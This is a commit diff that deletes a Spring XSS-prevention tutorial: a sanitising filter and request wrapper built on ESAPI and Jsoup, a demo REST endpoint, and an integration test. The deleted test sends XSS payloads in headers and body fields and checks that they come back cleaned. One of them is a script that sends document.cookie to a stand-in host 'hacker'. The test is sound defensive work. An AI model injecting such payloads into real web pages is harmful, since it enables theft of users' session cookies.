Bael 5067: Update "Prevent Cross-Site Scripting (XSS) in a Spring application" article (#11127)

* bael-5067: remove test case

* bael-5067: remove REST api

* bael-5067: remove XSS filter

Co-authored-by: sharifi <h_sharifi@modernisc.com>

spring-security-modules/spring-5-security/src/main/java/com/baeldung/xss/Person.java

@@ -1,36 +0,0 @@
-package com.baeldung.xss;
-
-public class Person {
-    private String firstName;
-    private String lastName;
-    private int age;
-
-    public String getFirstName() {
-        return firstName;
-    }
-
-    public void setFirstName(String firstName) {
-        this.firstName = firstName;
-    }
-
-    public String getLastName() {
-        return lastName;
-    }
-
-    public void setLastName(String lastName) {
-        this.lastName = lastName;
-    }
-
-    public int getAge() {
-        return age;
-    }
-
-    public void setAge(int age) {
-        this.age = age;
-    }
-
-    @Override
-    public String toString() {
-        return "Person {" + "firstName='" + firstName + '\'' + ", lastName='" + lastName + '\'' + ", age=" + age + '}';
-    }
-}

spring-security-modules/spring-5-security/src/main/java/com/baeldung/xss/PersonController.java

@@ -1,31 +0,0 @@
-package com.baeldung.xss;
-
-import com.fasterxml.jackson.databind.node.JsonNodeFactory;
-import com.fasterxml.jackson.databind.node.ObjectNode;
-import org.springframework.http.HttpStatus;
-import org.springframework.http.ResponseEntity;
-import org.springframework.web.bind.annotation.PostMapping;
-import org.springframework.web.bind.annotation.RequestHeader;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.RestController;
-import org.springframework.web.bind.annotation.RequestParam;
-import org.springframework.web.bind.annotation.RequestBody;
-
-import java.util.Map;
-
-@RestController
-@RequestMapping("/personService")
-public class PersonController {
-
-    @PostMapping(value = "/person")
-    private ResponseEntity<String> savePerson(@RequestHeader Map<String, String> headers,
-        @RequestParam String param, @RequestBody Person body) {
-        ObjectNode response = JsonNodeFactory.instance.objectNode();
-        headers.forEach((key, value) -> response.put(key, value));
-        response.put("firstName", body.getFirstName());
-        response.put("lastName", body.getLastName());
-        response.put("age", body.getAge());
-        response.put("param", param);
-        return new ResponseEntity<String>(response.toString(), HttpStatus.OK);
-    }
-}

spring-security-modules/spring-5-security/src/main/java/com/baeldung/xss/XSSFilter.java

@@ -1,44 +0,0 @@
-package com.baeldung.xss;
-
-import org.apache.commons.io.IOUtils;
-import org.apache.commons.lang.StringUtils;
-import org.springframework.core.Ordered;
-import org.springframework.core.annotation.Order;
-import org.springframework.stereotype.Component;
-import javax.servlet.Filter;
-import javax.servlet.FilterConfig;
-import javax.servlet.ServletRequest;
-import javax.servlet.ServletResponse;
-import javax.servlet.ServletException;
-import javax.servlet.FilterChain;
-import javax.servlet.http.HttpServletRequest;
-import java.io.IOException;
-
-@Component
-@Order(Ordered.HIGHEST_PRECEDENCE)
-public class XSSFilter implements Filter {
-
-    @Override
-    public void init(FilterConfig filterConfig) {
-    }
-
-    @Override
-    public void destroy() {
-    }
-
-    @Override
-    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
-        throws IOException, ServletException {
-
-        XSSRequestWrapper wrappedRequest = new XSSRequestWrapper((HttpServletRequest) request);
-
-        String body = IOUtils.toString(wrappedRequest.getReader());
-        if (!StringUtils.isBlank(body)) {
-            body = XSSUtils.stripXSS(body);
-            wrappedRequest.resetInputStream(body.getBytes());
-        }
-
-        chain.doFilter(wrappedRequest, response);
-    }
-
-}

spring-security-modules/spring-5-security/src/main/java/com/baeldung/xss/XSSRequestWrapper.java

@@ -1,123 +0,0 @@
-package com.baeldung.xss;
-
-import org.apache.commons.codec.Charsets;
-import org.apache.commons.io.IOUtils;
-import javax.servlet.ReadListener;
-import javax.servlet.ServletInputStream;
-import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpServletRequestWrapper;
-
-import java.io.ByteArrayInputStream;
-import java.io.IOException;
-import java.io.BufferedReader;
-import java.io.InputStreamReader;
-import java.io.InputStream;
-import java.util.ArrayList;
-import java.util.Collections;
-import java.util.Enumeration;
-import java.util.List;
-
-import static com.baeldung.xss.XSSUtils.stripXSS;
-
-
-public class XSSRequestWrapper extends HttpServletRequestWrapper {
-
-    private byte[] rawData;
-    private HttpServletRequest request;
-    private ResettableServletInputStream servletStream;
-
-    public XSSRequestWrapper(HttpServletRequest request) {
-        super(request);
-        this.request = request;
-        this.servletStream = new ResettableServletInputStream();
-    }
-
-    public void resetInputStream(byte[] newRawData) {
-        rawData = newRawData;
-        servletStream.stream = new ByteArrayInputStream(newRawData);
-    }
-
-    @Override
-    public ServletInputStream getInputStream() throws IOException {
-        if (rawData == null) {
-            rawData = IOUtils.toByteArray(this.request.getReader(), Charsets.UTF_8);
-            servletStream.stream = new ByteArrayInputStream(rawData);
-        }
-        return servletStream;
-    }
-
-    @Override
-    public BufferedReader getReader() throws IOException {
-        if (rawData == null) {
-            rawData = IOUtils.toByteArray(this.request.getReader(), Charsets.UTF_8);
-            servletStream.stream = new ByteArrayInputStream(rawData);
-        }
-        return new BufferedReader(new InputStreamReader(servletStream));
-    }
-
-    private class ResettableServletInputStream extends ServletInputStream {
-
-        private InputStream stream;
-
-        @Override
-        public int read() throws IOException {
-            return stream.read();
-        }
-
-        @Override
-        public boolean isFinished() {
-            return false;
-        }
-
-        @Override
-        public boolean isReady() {
-            return false;
-        }
-
-        @Override
-        public void setReadListener(ReadListener readListener) {
-
-        }
-    }
-
-    @Override
-    public String[] getParameterValues(String parameter) {
-        String[] values = super.getParameterValues(parameter);
-        if (values == null) {
-            return null;
-        }
-        int count = values.length;
-        String[] encodedValues = new String[count];
-        for (int i = 0; i < count; i++) {
-            encodedValues[i] = stripXSS(values[i]);
-        }
-        return encodedValues;
-    }
-
-    @Override
-    public String getParameter(String parameter) {
-        String value = super.getParameter(parameter);
-        return stripXSS(value);
-    }
-
-    @Override
-    public String getHeader(String name) {
-        String value = super.getHeader(name);
-        return stripXSS(value);
-    }
-
-    @Override
-    public Enumeration<String> getHeaders(String name) {
-        List<String> result = new ArrayList<>();
-        Enumeration<String> headers = super.getHeaders(name);
-        while (headers.hasMoreElements()) {
-            String header = headers.nextElement();
-            String[] tokens = header.split(",");
-            for (String token : tokens) {
-                result.add(stripXSS(token));
-            }
-        }
-        return Collections.enumeration(result);
-    }
-
-}

spring-security-modules/spring-5-security/src/main/java/com/baeldung/xss/XSSUtils.java

@@ -1,19 +0,0 @@
-package com.baeldung.xss;
-
-import org.jsoup.Jsoup;
-import org.jsoup.safety.Whitelist;
-import org.owasp.esapi.ESAPI;
-
-public class XSSUtils {
-
-    public static String stripXSS(String value) {
-        if (value == null) {
-            return null;
-        }
-        value = ESAPI.encoder()
-            .canonicalize(value)
-              .replaceAll("\0", "");
-        return Jsoup.clean(value, Whitelist.none());
-    }
-
-}

spring-security-modules/spring-5-security/src/test/java/com/baeldung/xss/PersonControllerIntegrationTest.java

@@ -1,64 +0,0 @@
-package com.baeldung.xss;
-
-import com.fasterxml.jackson.databind.JsonNode;
-import com.fasterxml.jackson.databind.ObjectMapper;
-import com.fasterxml.jackson.databind.node.JsonNodeFactory;
-import com.fasterxml.jackson.databind.node.ObjectNode;
-import org.junit.jupiter.api.Test;
-import org.springframework.boot.test.context.SpringBootTest;
-import org.springframework.boot.web.server.LocalServerPort;
-import org.springframework.http.*;
-import org.springframework.web.client.RestTemplate;
-import org.springframework.web.util.UriComponentsBuilder;
-import java.io.IOException;
-import static org.assertj.core.api.Assertions.assertThat;
-
-@SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT)
-class PersonControllerIntegrationTest {
-
-    @LocalServerPort
-    int randomServerPort;
-
-    @Test
-    public void givenRequestIsSuspicious_whenRequestIsPost_thenResponseIsClean()
-        throws IOException {
-        // given
-        String createPersonUrl;
-        RestTemplate restTemplate;
-        HttpHeaders headers;
-        UriComponentsBuilder builder;
-        ObjectMapper objectMapper = new ObjectMapper();
-        ObjectNode personJsonObject = JsonNodeFactory.instance.objectNode();
-        createPersonUrl = "http://localhost:" + randomServerPort + "/personService/person";
-        restTemplate = new RestTemplate();
-        headers = new HttpHeaders();
-
-        // when
-        personJsonObject.put("id", 1);
-        personJsonObject.put("firstName", "baeldung <script>alert('XSS')</script>");
-        personJsonObject.put("lastName", "baeldung <b onmouseover=alert('XSS')>click me!</b>");
-
-        builder = UriComponentsBuilder.fromHttpUrl(createPersonUrl)
-            .queryParam("param", "<script>");
-
-        headers.setContentType(MediaType.APPLICATION_JSON);
-        headers.add("header_1", "<body onload=alert('XSS')>");
-        headers.add("header_2", "<span onmousemove='doBadXss()'>");
-        headers.add("header_3", "<SCRIPT>var+img=new+Image();img.src=\"http://hacker/\"%20+%20document.cookie;</SCRIPT>");
-        headers.add("header_4", "<p>Your search for 'flowers <script>evil_script()</script>'");
-        HttpEntity<String> request = new HttpEntity<>(personJsonObject.toString(), headers);
-
-        ResponseEntity<String> personResultAsJsonStr = restTemplate.exchange(builder.toUriString(),
-            HttpMethod.POST, request, String.class);
-        JsonNode root = objectMapper.readTree(personResultAsJsonStr.getBody());
-
-        // then
-        assertThat(root.get("firstName").textValue()).isEqualTo("baeldung ");
-        assertThat(root.get("lastName").textValue()).isEqualTo("baeldung click me!");
-        assertThat(root.get("param").textValue()).isEmpty();
-        assertThat(root.get("header_1").textValue()).isEmpty();
-        assertThat(root.get("header_2").textValue()).isEmpty();
-        assertThat(root.get("header_3").textValue()).isEmpty();
-        assertThat(root.get("header_4").textValue()).isEqualTo("Your search for 'flowers '");
-    }
-}